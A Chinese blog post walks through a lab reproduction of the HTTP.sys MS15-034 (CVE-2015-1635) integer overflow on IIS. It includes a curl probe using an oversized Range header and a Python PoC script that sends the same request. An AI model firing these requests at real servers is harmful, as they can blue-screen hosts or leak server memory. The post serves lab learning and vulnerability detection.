HTTP.sys ms15-034 远程代码执行漏㓊(CVE-2015-1635)

于 2024-06-28 08:00:00 发布
阅读量759 收藏 5
点赞数 10
分类专栏: 安全 RCE 文章标签: http 网络协议 网络 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/139859841
版权
安全 同时被 2 个专栏收录
155 篇文章 9 订阅
订阅专栏
RCE
14 篇文章 0 订阅
订阅专栏

目录

漏洞概述

HTTP.sys简介

漏洞成因

漏洞危害

影响版本

环境搭建

漏洞导致蓝屏演示

漏洞导致远程代码执行演示

漏洞探测

漏洞利用

漏洞概述

HTTP.sys简介

HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞

漏洞成因

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞

漏洞危害

攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

影响版本

任何安装了微软IIS 6.0以上的的

Windows 7、Windows Server 2008 R2、 Windows Server 2012 R2 、Windows Server 2012、Windows 8、2、Windows 8.1 系统

环境搭建

攻击机kali 192.168.159.151

靶机windws 7 192.168.159. 并且部署了IIS服务

首先就是下载好windows 7主机

测试连通性,无法ping通,关闭防火墙

然后再进行ping就可以看到ping成功了

 部署IIS服务:

浏览器访问:

可以看到IIS服务已经部署成功了

漏洞导致蓝屏演示

首先进入到msfconsole中

使用search查找MS15-034可以利用的payload

选择一个payload后查看需要配置的选项:

设置需要进行配置的选项:

再次查看靶机状态:

可以看到靶机已经蓝屏重启了

漏洞导致远程代码执行演示

漏洞探测

payload:

curl -v 192.168.159.252 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

如果相应码为416则说明存在漏洞

可以看到响应码正是416,说明存在漏洞,下面就可以进行漏洞利用了

漏洞利用

使用python poc脚本进行测试:

import socket
import random
ipAddr = "192.168.159.252"
hexAllFfff = "18446744073709551615"
req1 = b"GET / HTTP/1.0\r\n\r\n"
req = b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff.encode() + b"\r\n\r\n"
print("[*] Audit Started")
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if b"Microsoft" not in boringResp:
    print("[*] Not IIS")
    exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if b"Requested Range Not Satisfiable" in goodResp:
    print("[!!] Rooo")
elif b" The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")

可以看到成功利用 

未知百分百
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
MS15-034HTTP.sys 远程执行代码
05-04
给内网应用的伙伴们一个福利 在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行洞危害非常大, 洞信息 远程执行代码洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此洞。 成功利用此洞的攻击者可以在系统帐户的上下文中执行任意代码。 若要利用此洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此洞。 Microsoft 通过协同的洞披露渠道了解到此洞的信息。 在最初发布此安全公告时,Microsoft 未收到任何表明此洞已公开用于攻击用户的信息。 CVE编号:CVE-2015-1635 CNNVD编号:CNNVD-201504-257
MS15-034 HTTP.sys 远程执行代码CVE-2015-1635)POC
03-19
远程执行代码洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此洞。 成功利用此洞的攻击者可以在系统帐户的上下文中执行任意代码
CVE-2015-1635/MS15-034远程代码执行
dgjkkhcf的博客
09-20 4206
在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行
洞复现之CVE-2015-1635-HTTP.SYS远程执行代码洞(ms15-034
白帽子九一
04-19 3623
1.1.1 洞描述 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码洞,编号为:CVE-2015-1635MS15-034 )。利用HTTP.sys安全洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、
网络安全进阶篇(十二章-2)HTTP.SYS远程代码执行洞(MS15-034)
划水的小白白
08-31 4286
1.简介 洞编号:CVE-2015-1635MS15-034远程执行代码洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此洞。 成功利用此洞的攻击者可以在系统帐户的上下文中执行任意代码。 2.影响范围 任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win Server 2012、 Win Server 2012 R2、 Win 7、 Win 8、 Win 8.1
HTTP.SYS 远程执行代码洞分析(MS15-034
weixin_33948416的博客
09-08 799
  在2015年4月安全补丁日,微软发布了11项安全更新,共修复了包括Microsoft Windows、Internet Explorer、Office、.NET Framework、Server软件、Office Services和Web Apps中存在的26个安全洞。其中就修复了HTTP.sys 中一处允许远程执行代码洞,编号为:CVE-2015-1635MS15-034 )。    ...
HTTP.sys远程执行代码洞(CVE-2015-1635MS15-034
Fly_鹏程万里
05-05 8883
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
MS15-034 CVE-2015-1635 HTTP远程代码执行洞 (洞验证)_ms15-034 cve-2015-1635 http远程代码执行洞检测
最新发布
2401_83974087的博客
04-18 694
当存在CVE-2015-1635洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。该洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此洞。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行洞验证DDOS攻击危害严重所以不执行命令进行演示。
洞复现(二):HTTP.SYS远程代码执行洞(MS15-034)
weixin_47306547的博客
11-20 9008
洞介绍 洞编号:CVE-2015-1635MS15-034远程执行代码洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此洞。 成功利用此洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响范围 Windows 7 Windows Server 2008 R2 Windows 8 Windows Server 2012 Windows 8.1 Windows Server 2012 R2
MS15-034 HTTP.sys远程执行代码洞(原理扫描)
11-16
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这...
CVE-2015-1635MS15-034Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
HTTP.sys远程代码执行洞(MS15-034)(CVE-2015-1635) 洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行洞 (MS15-034)(CVE-2015-1635)
安全狗:HTTP.SYS远程执行代码洞分析 (MS15-034
weixin_34347651的博客
04-17 377
2019独角兽企业重金招聘Python工程师标准>>> ...
Windows Server 2012 R2 Microsoft Windows HTTP.sys远程代码执行洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-17 1293
一、洞情况 二、整改记录
HTTP.sys远程代码执行
qq_50854662的博客
05-19 1314
HTTP.sys远程代码执行
HTTP.SYS远程代码执行洞验证及其复现(CVE-2015-1635蓝屏洞)
weixin_74985952的博客
06-13 3662
HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sysHTTP.sys远程代码执行洞实质是HTTP.sys的整数溢出洞。
CVE-2015-1635-HTTP.SYS远程执行代码洞复现
W小哥
04-20 7857
一、洞描述 远程执行代码洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此洞。 成功利用此洞的攻击者可以在系统帐户的上下文中执行任意代码。 攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。 微软官方说明:https://docs.microsoft.com/z...
HTTP.SYS远程代码执行
qq_44905657的博客
12-21 3256
HTTP.SYS远程代码执行
Microsoft Windows HTTP.sys远程代码执行洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP请求来利用该洞。 该洞的原理是在HTTP.sys驱动程序中存在一个缓冲区溢出洞,攻击者可以通过发送特制的HTTP请求来触发该洞。当HTTP.sys驱动程序接收到特制的HTTP请求时,它会尝试解析请求头,并将其复制到缓冲区中。但如果请求头中包含了一些特定的数据,就会导致缓冲区溢出,从而使攻击者能够执行任意代码。 为了检测该洞,可以使用一些洞扫描工具,如Nessus、OpenVAS等。这些工具可以通过发送特制的HTTP请求来检测目标系统是否存在该洞。 同时,为了防止该洞的利用,可以采取以下措施: 1. 安装Microsoft发布的安全补丁; 2. 禁用WebDAV; 3. 配置网络防火墙,限制HTTP请求的访问权限; 4. 使用WAF(Web应用程序防火墙)等安全设备,对HTTP请求进行过滤和检查。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值